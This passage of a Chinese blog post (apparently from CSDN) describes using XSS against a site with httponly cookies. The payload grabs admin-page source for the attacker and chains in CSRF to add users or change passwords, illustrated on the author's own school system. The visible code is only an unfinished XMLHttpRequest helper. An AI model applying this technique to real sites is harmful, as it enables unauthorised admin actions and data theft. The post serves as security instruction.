xss实现获取网站源码

本文探讨了在网站cookie设置为httponly时,如何通过XSS获取网站后台URL,并利用AJAX构造POST数据包进行潜在的XSS+CSRF攻击。通过在XSS平台上设置代码,当管理员访问时,会将后台源码发送到攻击者的服务器,以此发现并尝试执行敏感操作,如添加用户、修改密码等。
摘要由CSDN通过智能技术生成

当网站cookie设置了httponly,xss获取不到到网站的cookie。但是我们是可以获取到网站后台的url。

这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删除用户,修改密码,数据库备份等等。

在这个xss点上,用ajax构造post数据包,添加用户。这就应该是xss+csrf的利用。

最近开发我们学校的党建系统,下面我们来复现一下上面操作:

1、前提是我们已经获得后台的地址了,这时候在xss平台上配置如下代码:

 1     function createXmlHttp() {
 2     if (window.XMLHttpRequest) {
 3         xmlHttp = new XMLHttpRequest()
 4     } else {
 5         var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
 6         for (var n = 0; n < MSXML.length; n++) {
 7             try {
 8                 xmlHttp = new ActiveXObject(MSXML[n]);
 9                 break
10             } catch(e) {}
11         }
12     }
13 }
14 createXmlHttp();
15 xmlHttp.onreadystatechange = function(){
16
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值